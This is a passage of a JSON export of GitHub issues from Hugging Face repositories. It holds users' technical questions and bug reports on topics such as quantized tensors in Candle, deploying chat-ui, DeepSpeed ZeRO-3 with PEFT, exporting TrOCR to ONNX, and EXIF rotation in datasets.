"labels": [], "created_at": "2023-09-30T14:10:30Z", "updated_at": "2025-02-10T00:27:24Z", "user": "KexinFeng" }, { "repo": "huggingface/candle", "number": 1006, "title": "Question: How to use quantized tensors?", "body": "Hello everybody,\r\n\r\nI was looking through Candle's quantized tensor code when I noticed that there is only a matmul_t implemented for QuantizedType, and no other operations. Perhaps other could operations be added?\r\n\r\nIn addition, is there an example of using quantized tensors/converting them from normal tensors?\r\n\r\nThanks!", "url": "https://github.com/huggingface/candle/issues/1006", "state": "closed", "labels": [], "created_at": "2023-09-30T13:35:16Z", "updated_at": "2024-08-17T15:20:58Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 340, "title": "question", "body": "hi @xenova is still there any position as js ts backend developer, next week 06 oct i will be free by finishing the senlife project i am working on for a uk clients this is the app that i build backend for \r\nhttps://play.google.com/store/apps/details?id=com.senlife.app&hl=en&gl=US\r\n", "url": "https://github.com/huggingface/transformers.js/issues/340", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-30T11:35:23Z", "updated_at": "2023-10-02T10:01:20Z", "user": "jedLahrim" }, { "repo": "huggingface/chat-ui", "number": 465, "title": "Where to deploy other than HF?", "body": "Hey,\r\n\r\nI've been trying to deploy the chat-ui somewhere I can use a custom domain (such as vercel and azure). \r\n\r\nEach of them comes with different problems that I have yet to solve.\r\n\r\nVercel issues described [here](https://github.com/huggingface/chat-ui/issues/212).\r\n\r\nIt does not seem like I can deploy this as a Azure SWA, as it fails when using the azure-swa-adapter for sveltekit with the following error.\r\n\r\n```\r\nUsing adapter-azure-swa\r\n\u2718 [ERROR] Top-level await is currently not supported with the \"cjs\" output format\r\n\r\n .svelte-kit/output/server/chunks/models.js:94:15:\r\n 94 \u2502 const models = await Promise.all(\r\n \u2575 ~~~~~\r\n\r\n\u2718 [ERROR] Top-level await is currently not supported with the \"cjs\" output format\r\n\r\n .svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:199:18:\r\n 199 \u2502 const extractor = await pipeline(\"feature-extraction\", modelId);\r\n \u2575 ~~~~~\r\n\r\n\u25b2 [WARNING] \"./xhr-sync-worker.js\" should be marked as external for use with \"require.resolve\" [require-resolve-not-external]\r\n\r\n node_modules/jsdom/lib/jsdom/living/xhr/XMLHttpRequest-impl.js:31:57:\r\n 31 \u2502 ... require.resolve ? require.resolve(\"./xhr-sync-worker.js\") : null;\r\n \u2575 ~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nerror during build:\r\nError: Build failed with 2 errors:\r\n.svelte-kit/output/server/chunks/models.js:94:15: ERROR: Top-level await is currently not supported with the \"cjs\" output format\r\n.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:199:18: ERROR: Top-level await is currently not supported with the \"cjs\" output format\r\n at failureErrorWithLog (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1575:15)\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1033:28\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:978:67\r\n at buildResponseToResult (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1031:7)\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1143:14\r\n at responseCallbacks. (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:680:9)\r\n at handleIncomingPacket (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:735:9)\r\n at Socket.readFromStdout (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:656:7)\r\n at Socket.emit (node:events:514:28)\r\n at addChunk (node:internal/streams/readable:324:12)\r\n\r\n\r\n---End of Oryx build logs---\r\nOryx has failed to build the solution.\r\n\r\n```\r\n\r\nAny suggestions on how I can otherwise deploy this?", "url": "https://github.com/huggingface/chat-ui/issues/465", "state": "closed", "labels": [], "created_at": "2023-09-29T13:58:42Z", "updated_at": "2023-12-07T19:10:00Z", "comments": 2, "user": "mhenrichsen" }, { "repo": "huggingface/dataset-viewer", "number": 1892, "title": "Use swap to avoid OOM?", "body": "The pods don't have swap. Is it possible to have swap to avoid OOM, even at the expense of longer processing time in workers?", "url": "https://github.com/huggingface/dataset-viewer/issues/1892", "state": "closed", "labels": [ "question", "infra", "P2" ], "created_at": "2023-09-29T13:48:54Z", "updated_at": "2024-06-19T14:23:36Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 337, "title": "[Question] How do I specify a non-huggingface URL (that doesn't start with `/models/`) in `AutoTokenizer.from_pretrained`?", "body": "My tokenizer files are hosted within this folder:\r\n```\r\nhttps://example.com/public/models/TheBloke/Llama-2-13B-GPTQ/\r\n```\r\nFirst I load the lib:\r\n```js\r\nlet { AutoTokenizer } = await import('https://cdn.jsdelivr.net/npm/@xenova/transformers@2.6.1');\r\n```\r\nThen I tried what I thought would be the most obvious/intuitive API:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"/public/models/TheBloke/Llama-2-13B-GPTQ\")\r\n// requests: https://example.com/models/public/models/TheBloke/Llama-2-13B-GPTQ/tokenizer.json\r\n```\r\nThis is strongly counter-intuitive to me. If I add a `/` at the start of the URL, it shouldn't add anything before that. A path that starts with `/` on the web always means \"append this to the origin\".\r\n\r\nSo I read the docs, and it seems to suggest that you need to put at `.` on the end:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"/public/models/TheBloke/Llama-2-13B-GPTQ/.\")\r\n// requests: https://example.com/models/public/models/TheBloke/Llama-2-13B-GPTQ/tokenizer.json \r\n```\r\nNope. So the next obvious step was to just give it an absolute URL and be done with it:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"https://example.com/public/models/TheBloke/Llama-2-13B-GPTQ\")\r\n// requests: 'https://huggingface.co/https://example.com/public/models/TheBloke/Llama-2-13B-GPTQ/resolve/main/tokenizer_config.json\r\n```\r\nOof.\r\n\r\nSo I'm a bit confused here \ud83d\ude35\u200d\ud83d\udcab\r\n\r\nGoing to keep trying, but I've spent 20 minutes on this so far, so posting here so you can improve the DX around this, even if I do manage to solve it myself soon.", "url": "https://github.com/huggingface/transformers.js/issues/337", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-28T21:00:41Z", "updated_at": "2023-09-28T22:03:05Z", "user": "josephrocca" }, { "repo": "huggingface/transformers.js", "number": 334, "title": "[Question] failed to call OrtRun(). error code = 1. When I try to load Xenova/pygmalion-350m", "body": "I'm getting an error `failed to call OrtRun(). error code = 1.` When I try to load Xenova/pygmalion-350m. The error is as follows\r\n```\r\nwasm-core-impl.ts:392 Uncaught Error: failed to call OrtRun(). error code = 1.\r\n at e.run (wasm-core-impl.ts:392:19)\r\n at e.run (proxy-wrapper.ts:215:17)\r\n at e.OnnxruntimeWebAssemblySessionHandler.run (session-handler.ts:100:15)\r\n at InferenceSession.run (inference-session-impl.ts:108:40)\r\n at sessionRun (models.js:191:36)\r\n at async Function.decoderForward [as _forward] (models.js:478:26)\r\n at async Function.forward (models.js:743:16)\r\n at async Function.decoderRunBeam [as _runBeam] (models.js:564:18)\r\n at async Function.runBeam (models.js:1284:16)\r\n at async Function.generate (models.js:1009:30)\r\n```\r\n\r\nAnd my Code for running it is this\r\n\r\n```\r\n\r\nlet text = 'Once upon a time, there was';\r\nlet generator = await pipeline('text-generation', 'Xenova/pygmalion-350m');\r\nlet output = await generator(text, {\r\n temperature: 2,\r\n max_new_tokens: 10,\r\n repetition_penalty: 1.5,\r\n no_repeat_ngram_size: 2,\r\n num_beams: 2,\r\n num_return_sequences: 2,\r\n});\r\n\r\nconsole.log(output);\r\n```\r\n\r\nI see that `OrtRun` is something returned by the OnnxRuntime on a failure but have you had success in running the Pygmalion-350m model ?", "url": "https://github.com/huggingface/transformers.js/issues/334", "state": "open", "labels": [ "question" ], "created_at": "2023-09-28T01:34:36Z", "updated_at": "2023-12-16T17:14:12Z", "user": "sebinthomas" }, { "repo": "huggingface/datasets", "number": 6267, "title": "Multi label class encoding", "body": "### Feature request\n\nI have a multi label dataset and I'd like to be able to class encode the column and store the mapping directly in the features just as I can with a single label column. `class_encode_column` currently does not support multi labels.\r\n\r\nHere's an example of what I'd like to encode:\r\n\r\n```\r\ndata = {\r\n 'text': ['one', 'two', 'three', 'four'],\r\n 'labels': [['a', 'b'], ['b'], ['b', 'c'], ['a', 'd']]\r\n}\r\n\r\ndataset = Dataset.from_dict(data)\r\ndataset = dataset.class_encode_column('labels')\r\n```\r\n\r\nI did some digging into the code base to evaluate the feasibility of this (note I'm very new to this code base) and from what I noticed the `ClassLabel` feature is still stored as an underlying raw data type of int so I thought a `MultiLabel` feature could similarly be stored as a Sequence of ints, thus not requiring significant serialization / conversion work to / from arrow.\r\n\r\nI did a POC of this [here](https://github.com/huggingface/datasets/commit/15443098e9ce053943172f7ec6fce3769d7dff6e) and included a simple test case (please excuse all the commented out tests, going for speed of POC here and didn't want to fight IDE to debug a single test). In the test I just assert that `num_classes` is the same to show that things are properly serializing, but if you break after loading from disk you'll see the dataset correct and the dataset feature is as expected.\r\n\r\nAfter digging more I did notice a few issues\r\n- After loading from disk I noticed type of the `labels` class is `Sequence` not `MultiLabel` (though the added `feature` attribute came through). This doesn't happen for `ClassLabel` but I couldn't find the encode / decode code paths that handle this.\r\n- I subclass `Sequence` in `MultiLabel` to leverage existing serialization, but this does miss the custom encode logic that `ClassLabel` has. I'm not sure of the best way to approach this as I haven't fully understood the encode / decode flow for datasets. I suspect my simple implementation will need some improvement as it'll require a significant amount of repeated logic to mimic `ClassLabel` behavior.\r\n\r\n\n\n### Motivation\n\nSee above - would like to support multi label class encodings.\n\n### Your contribution\n\nThis would be a big help for us and we're open to contributing but I'll likely need some guidance on how to implement to fit the encode / decode flow. Some suggestions on tests / would be great too, I'm guessing in addition to the class encode tests (that I'll need to expand) we'll need encode / decode tests.", "url": "https://github.com/huggingface/datasets/issues/6267", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-09-27T22:48:08Z", "updated_at": "2023-10-26T18:46:08Z", "comments": 7, "user": "jmif" }, { "repo": "huggingface/huggingface_hub", "number": 1698, "title": "How to change cache dir?", "body": "### Describe the bug\n\nby default, all downloaded models are stored on \r\n\r\n> cache_path = '/root/.cache/huggingface/hub'\r\n\r\nIs there a way to change this dir to something else?\r\n\r\nI tried to set \"HUGGINGFACE_HUB_CACHE\"\r\n\r\n```\r\nimport os\r\nos.environ['HUGGINGFACE_HUB_CACHE'] = '/my_workspace/models_cache'\r\n```\r\n\r\nbut it doesn't work,\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\n- huggingface_hub version: 0.17.2\r\n- Platform: Linux-5.4.0-162-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /root/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: adhikjoshi\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.2.0.dev20230922+cu118\r\n- Jinja2: 3.1.2\r\n- Graphviz: N/A\r\n- Pydot: N/A\r\n- Pillow: 10.0.1\r\n- hf_transfer: N/A\r\n- gradio: N/A\r\n- tensorboard: N/A\r\n- numpy: 1.24.4\r\n- pydantic: 2.3.0\r\n- aiohttp: N/A\r\n- ENDPOINT: https://huggingface.co\r\n- HUGGINGFACE_HUB_CACHE: /root/.cache/huggingface/hub\r\n- HUGGINGFACE_ASSETS_CACHE: /root/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /root/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/1698", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-27T07:45:30Z", "updated_at": "2023-09-27T09:08:34Z", "user": "adhikjoshi" }, { "repo": "huggingface/accelerate", "number": 2010, "title": "How to set different seed for DDP data sampler for every epoch", "body": "Hello there!\r\nI am using the following code to build my data loader.\r\n```python\r\n data_loader_train = DataLoader(\r\n dataset_train,\r\n collate_fn=collate_fn,\r\n batch_size=cfg.data.train_batch_size,\r\n num_workers=cfg.data.num_workers,\r\n pin_memory=cfg.data.pin_memory,\r\n )\r\ndata_loader_train = accelerator.prepare(data_loader_train)\r\n```\r\nI am using DDP for training and I want to set different data sample seed for every epoch, so that different epochs will have different batch data orders. How can I do that?", "url": "https://github.com/huggingface/accelerate/issues/2010", "state": "closed", "labels": [], "created_at": "2023-09-27T02:46:10Z", "updated_at": "2023-09-27T11:32:22Z", "user": "Mountchicken" }, { "repo": "huggingface/transformers", "number": 26412, "title": "How to run Trainer + DeepSpeed + Zero3 + PEFT ", "body": "### System Info\n\n- `transformers` version: 4.34.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.34\r\n- Python version: 3.11.4\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.24.0.dev0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n\n\n### Who can help?\n\n @ArthurZucker and @younesbelkada and @pacman100 and @muellerzr \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n[This script](https://gist.github.com/BramVanroy/f2abb3940111b73ae8923822ef6096dd) is a modification of the official run_clm script. The only additions are the BNB config and PEFT. Yet, I cannot get it to work with a [deepspeed zero3 config](https://github.com/philschmid/deep-learning-pytorch-huggingface/blob/main/training/configs/ds_falcon_180b_z3.json).\r\n\r\nRequirements to install:\r\n\r\n```\r\naccelerate >= 0.12.0\r\ntorch >= 1.3\r\ndatasets >= 1.8.0\r\nsentencepiece != 0.1.92\r\nprotobuf\r\nevaluate\r\nscikit-learn\r\ntrl\r\npeft\r\nbitsandbytes\r\n```\r\n\r\nIn the past I have had issues with low_cpu_mem_usage but neither a true/false value seem to get this to work:\r\n\r\nCommand 1:\r\n\r\n```sh\r\ndeepspeed --include=\"localhost:0,1\" run_clm.py \\\r\n --model_name_or_path facebook/opt-125m\\\r\n --dataset_name wikitext\\\r\n --dataset_config_name wikitext-2-raw-v1\\\r\n --per_device_train_batch_size 2\\\r\n --per_device_eval_batch_size 2\\\r\n --do_train\\\r\n --do_eval\\\r\n --output_dir /tmp/test-clm\\\r\n --deepspeed deepspeed_configs/ds_config_zero3.json\\\r\n --low_cpu_mem_usage true\r\n```\r\n==> `ValueError: DeepSpeed Zero-3 is not compatible with `low_cpu_mem_usage=True` or with passing a `device_map`.`\r\n\r\nCommand 2:\r\n\r\n```sh\r\ndeepspeed --include=\"localhost:0,1\" run_clm.py \\\r\n --model_name_or_path facebook/opt-125m\\\r\n --dataset_name wikitext\\\r\n --dataset_config_name wikitext-2-raw-v1\\\r\n --per_device_train_batch_size 2\\\r\n --per_device_eval_batch_size 2\\\r\n --do_train\\\r\n --do_eval\\\r\n --output_dir /tmp/test-clm\\\r\n --deepspeed deepspeed_configs/ds_config_zero3.json\\\r\n --low_cpu_mem_usage false\r\n```\r\n\r\n==> `ValueError: weight is on the meta device, we need a `value` to put in on 0.`\n\n### Expected behavior\n\nAny option to make this combination of Trainer + DeepSpeed + Zero3 + PEFT work.", "url": "https://github.com/huggingface/transformers/issues/26412", "state": "open", "labels": [ "WIP" ], "created_at": "2023-09-26T10:31:46Z", "updated_at": "2024-01-11T15:40:02Z", "user": "BramVanroy" }, { "repo": "huggingface/setfit", "number": 423, "title": "[Q] How to examine correct/wrong predictions in trainer.evaluate()", "body": "Hello,\r\n\r\nAfter doing \"metrics = trainer.evalute()\" as shown in the example code, is there a way to examine which rows in the evaluation data set were predicted correctly?\r\n\r\nThanks! ", "url": "https://github.com/huggingface/setfit/issues/423", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-25T23:41:53Z", "updated_at": "2023-11-24T13:04:45Z", "user": "youngjin-lee" }, { "repo": "huggingface/chat-ui", "number": 461, "title": "The custom endpoint response doesn't stream even though the endpoint is sending streaming content", "body": "@nsarrazin I'm transmitting the streaming response to the chat UI, but it displays all the content simultaneously rather than progressively streaming the text generation part. Can you help me address this issue?\r\n\r\nReference: #380 ", "url": "https://github.com/huggingface/chat-ui/issues/461", "state": "open", "labels": [ "support" ], "created_at": "2023-09-25T07:43:57Z", "updated_at": "2023-10-29T11:21:04Z", "comments": 2, "user": "nandhaece07" }, { "repo": "huggingface/autotrain-advanced", "number": 279, "title": "How to run AutoTrain Advanced UI locally", "body": "How to run AutoTrain Advanced UI locally \ud83d\ude22 ", "url": "https://github.com/huggingface/autotrain-advanced/issues/279", "state": "closed", "labels": [], "created_at": "2023-09-25T07:25:51Z", "updated_at": "2024-04-09T03:20:17Z", "user": "LronDC" }, { "repo": "huggingface/transformers.js", "number": 328, "title": "[Question] React.js serve sentence bert in browser keep reporting models not found.", "body": "my codes:\r\n```javascript\r\nexport const useInitTransformers = () => {\r\n const init = async () => {\r\n // @ts-ignore\r\n env.allowLocalModels = false;\r\n extractor = await pipeline(\r\n \"feature-extraction\",\r\n \"Xenova/all-mpnet-base-v2\",\r\n );\r\n };\r\n return { init };\r\n};\r\n```\r\n\r\nI'm building a frontend with React that can serve sentence bert directly in browser, but no idea why even i add the line\r\n`env.allowLocalModels = false`\r\n before pipeline loading the model. In the production environment, it's still trying to access model locally `/models/...`, but which will never exists in this usecase. \r\n\r\n**Is there any way i can bypass this check and directly pull the model from remote?**\r\n \r\n![image](https://github.com/xenova/transformers.js/assets/26846727/9b6222d7-cb02-44c1-b4e5-b3ab3f52797e)\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/328", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-24T15:51:47Z", "updated_at": "2024-10-18T13:30:11Z", "user": "bianyuanop" }, { "repo": "huggingface/candle", "number": 944, "title": "Question: How to tokeninize text for Llama?", "body": "Hello everybody,\n\nHow can I tokenize text to use with Llama? I want to fine-tune Llama on my custom data, so how can I tokenize from a String and then detokenize the logits into a String?\n\nI have looked at the Llama example for how to detokenize, but cannot find any clear documentation on how the implementation actually works for outputting results during training.\n\nThanks!", "url": "https://github.com/huggingface/candle/issues/944", "state": "closed", "labels": [], "created_at": "2023-09-23T18:19:56Z", "updated_at": "2023-09-23T23:01:13Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 327, "title": "Calling pipeline returns `undefined`. What are possible reasons?", "body": "The repository if you need it \u25b6\u25b6\u25b6 [China Cups](https://github.com/piscopancer/china-cups)\r\n\r\n## Next 13.5 / server-side approach\r\n\r\nJust started digging into your library. Sorry for stupidity.\r\n\r\n### `src/app/api/translate/route.ts` \ud83d\udc47\r\n```ts\r\nimport { NextRequest, NextResponse } from 'next/server'\r\nimport { PipelineSingleton } from '@/utils/pipeline'\r\n\r\nexport async function GET(request: NextRequest) {\r\n\tconst text = request.nextUrl.searchParams.get('text')\r\n\tif (!text) {\r\n\t\treturn NextResponse.json(\r\n\t\t\t{\r\n\t\t\t\terror: 'Missing text',\r\n\t\t\t},\r\n\t\t\t{ status: 400 },\r\n\t\t)\r\n\t}\r\n\tconst translator = await PipelineSingleton.getInstance()\r\n\tconst translation = await translator(text)\r\n\tconsole.log(translation) // undefined\r\n\treturn NextResponse.json(translation)\r\n}\r\n```\r\n\r\n### `src/utils/pipeline.ts` \ud83d\udc47\r\nThis singleton must be fine, I suppose. \r\n```ts\r\nimport { Pipeline, pipeline } from '@xenova/transformers'\r\nimport { PretrainedOptions } from '@xenova/transformers/types/models'\r\n\r\nfunction DeclarePipeline() {\r\n\treturn class PipelineSingleton {\r\n\t\tstatic task = 'question-answering'\r\n\t\tstatic model = undefined as undefined | string\r\n\t\tstatic instance = null as null | Promise\r\n\r\n\t\tstatic async getInstance(options?: PretrainedOptions) {\r\n\t\t\tif (!this.instance) {\r\n\t\t\t\tthis.instance = pipeline(this.task, this.model, options)\r\n\t\t\t}\r\n\t\t\treturn this.instance\r\n\t\t}\r\n\t}\r\n}\r\n\r\nexport const PipelineSingleton = (() => {\r\n\tif (process.env.NODE_ENV !== 'production') {\r\n\t\tconst gl = global as any\r\n\t\tif (!gl.PipelineSingleton) {\r\n\t\t\tgl.PipelineSingleton = DeclarePipeline()\r\n\t\t}\r\n\t\treturn gl.PipelineSingleton\r\n\t}\r\n\treturn DeclarePipeline()\r\n})() as ReturnType\r\n```\r\n### `src/app/page.tsx`This is how I query it \ud83d\udc47\r\nBtw, no errors occur on this stage\r\n```tsx\r\nexport default async function HomePage({ searchParams }: THomePage) {\r\n\tconst text = 'Hello'\r\n\tconst translation = await axios.get(`/translate?text=${text}`).then((res) => res.data())\r\n\t// const translation = await fetch(`/translate?text=${encodeURIComponent(text)}`).then((res) => res.json())\r\n\treturn
{JSON.stringify(translation)}
\r\n```\r\n\r\n## One more very important thing\r\nWhen I **manually** go to `http://localhost:3000/api/translate?text=Hello` I very happily get this error:\r\n```\r\n \u2a2f TypeError: Value is not JSON serializable\r\n at serializeJavascriptValueToJSONString (node:internal/deps/undici/undici:1203:15)\r\n at Response.json (node:internal/deps/undici/undici:6746:55)\r\n at NextResponse.json (webpack-internal:///(rsc)/./node_modules/next/dist/server/web/spec-extension/response.js:66:35)\r\n at GET (webpack-internal:///(rsc)/./src/app/api/translate/route.ts:24:95)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async C:\\web-dev\\next\\china-cups\\node_modules\\next\\dist\\compiled\\next-server\\app-route.runtime.dev.js:1:66877\r\n ```\r\n \ud83d\udc46 the browser cannot load this url if text=... is present \ud83d\ude1f.\r\n\r\n \ud83d\udc96\r\n ", "url": "https://github.com/huggingface/transformers.js/issues/327", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-23T15:57:24Z", "updated_at": "2023-09-24T06:55:08Z", "user": "piscopancer" }, { "repo": "huggingface/optimum", "number": 1410, "title": "Export TrOCR to ONNX", "body": "I was trying to export my fine-tuned TrOCR model to ONNX using following command. I didn't get any errors, but in onnx folder only encoder model is saved.\r\n```\r\n!python -m transformers.onnx --model=model_path --feature=vision2seq-lm onnx/ --atol 1e-2\r\n```\r\nSo, regarding this, I have 2 questions.\r\n1. How to save decoder_model.onnx, so that I can use [this inference script](https://gist.github.com/mht-sharma/f38c670930ac7df413c07327e692ee39).\r\n2. If it is not possible to export the decoder model to ONNX, how can I perform inference using encoder_model.onnx? According to my understanding, model.generate() takes time to generate output, while the decode method doesn't consume as much time compared to the generate method. Is there any way to use encoder_model.onnx with the existing decoder model in order to optimize response time?\r\n```\r\np = processor(image, return_tensors=\"pt\").pixel_values\r\ngenerated_ids = model.generate(\r\n p,\r\n do_sample=True,\r\n top_k=5,\r\n top_p=0.1,\r\n num_beams=4,\r\n num_return_sequences=1,\r\n output_scores=True,\r\n use_cache=True,\r\n return_dict_in_generate=True\r\n)\r\n\r\ngenerated_text = processor.batch_decode(generated_ids.sequences, skip_special_tokens=True)[0]\r\n\r\n```\r\n\r\nPlease correct me if this approach to optimize response time is wrong.\r\nThanks.", "url": "https://github.com/huggingface/optimum/issues/1410", "state": "closed", "labels": [ "onnx" ], "created_at": "2023-09-23T09:19:50Z", "updated_at": "2024-10-15T16:21:52Z", "comments": 2, "user": "VallabhMahajan1" }, { "repo": "huggingface/chat-ui", "number": 459, "title": "Chats Stop generation button is broken?", "body": "whenever I'm using the Chat UI on hf.co/chat, and I press the stop generation button it deletes both the prompt and the response?", "url": "https://github.com/huggingface/chat-ui/issues/459", "state": "open", "labels": [ "support" ], "created_at": "2023-09-21T19:38:38Z", "updated_at": "2023-10-08T00:44:44Z", "comments": 4, "user": "VatsaDev" }, { "repo": "huggingface/chat-ui", "number": 457, "title": "Custom Models breaking Chat-ui", "body": "Setting a custom model in .env.local is now breaking chat-ui for me. @jackielii @nsarrazin \r\n\r\nIf I start mongo and then run ```npm run dev``` with a .env.local file including only the mongo url, there is no issue.\r\n\r\nThen I add the following:\r\n```\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"OpenAssistant/oasst-sft-4-pythia-12b-epoch-3.5\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"<|prompter|>\", # This does not need to be a token, can be any string\r\n \"assistantMessageToken\": \"<|assistant|>\", # This does not need to be a token, can be any string\r\n \"userMessageEndToken\": \"<|endoftext|>\", # Applies only to user messages. Can be any string.\r\n \"assistantMessageEndToken\": \"<|endoftext|>\", # Applies only to assistant messages. Can be any string.\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|endoftext|>\"] # This does not need to be tokens, can be any list of strings\r\n }\r\n }\r\n]`\r\n```\r\nand now I get:\r\n```\r\nUnexpected token \r\n in JSON at position 424\r\nSyntaxError: Unexpected token \r\n in JSON at position 424\r\n at JSON.parse ()\r\n at eval (/Users/ronanmcgovern/TR/chat-ui/src/lib/server/models.ts:75:14)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async instantiateModule (file:///Users/ronanmcgovern/TR/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9\r\n```\r\nThe specific line of code being referenced is this:\r\n```\r\n\"Based on the conversation history (my previous questions are: {{previousMessages}}), give me an appropriate query to answer my question for google search. You should not say more than query. You should not say any words except the query. For the context, today is {{currentDate}}\" +\r\n\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/457", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-21T11:12:42Z", "updated_at": "2023-09-21T16:03:30Z", "comments": 10, "user": "RonanKMcGovern" }, { "repo": "huggingface/datasets", "number": 6252, "title": "exif_transpose not done to Image (PIL problem)", "body": "### Feature request\n\nI noticed that some of my images loaded using PIL have some metadata related to exif that can rotate them when loading.\r\nSince the dataset.features.Image uses PIL for loading, the loaded image may be rotated (width and height will be inverted) thus for tasks as object detection and layoutLM this can create some inconsistencies (between input bboxes and input images). \r\n\r\nFor now there is no option in datasets.features.Image to specify that. We need to do the following when preparing examples (when preparing images for training, test or inference): \r\n```\r\nfrom PIL import Image, ImageOps \r\npil = ImageOps.exif_transpose(pil)\r\n```\r\n\r\nreference: https://stackoverflow.com/a/63950647/5720150 \r\n\r\nIs it possible to add this by default to the datasets.feature.Image ? or to add the option to do the ImageOps.exif_transpose?\r\n\r\nThank you\n\n### Motivation\n\nPrevent having inverted data related to exif metadata that may affect object detection tasks\n\n### Your contribution\n\nChanging in datasets.featrues.Image I can help with that. ", "url": "https://github.com/huggingface/datasets/issues/6252", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-09-21T08:11:46Z", "updated_at": "2024-03-19T15:29:43Z", "comments": 2, "user": "rhajou" }, { "repo": "huggingface/optimum", "number": 1401, "title": "BUG: running python file called onnx.py causes circular errors.", "body": "### System Info\r\n\r\n```shell\r\nlatest optimum, python 3.10, linux cpu.\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang, @echarlaix, @michaelbenayoun\r\n\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nhttps://github.com/huggingface/optimum/issues/1177\r\n\r\nDescription of Bug:\r\nIf I create a py file to run my own scripts, and name it \"onnx.py\", it wreaks all kinds of havoc. Specifically circular errors. It took me a while to figure it was caused by \"onnx.py\" being a reserved name. This is the first time I've ever come across such an issue. I'm not sure if other modules prevent these issues by ringfencing their scope to specific folders or namespaces.. or whether it's just bad luck.\r\n\r\nIs it possible to ringfence this kind of issue by either renaming the internal onnx.py file to something that users would never use OR, customize a validation check that tells user which filenames are reserved, OR at least updating the error message so that users don't need half a day to figure out what's causing the issue?\r\n\r\nMany thanks\r\n\r\n### Expected behavior\r\n\r\nThat either I can use any filename for my 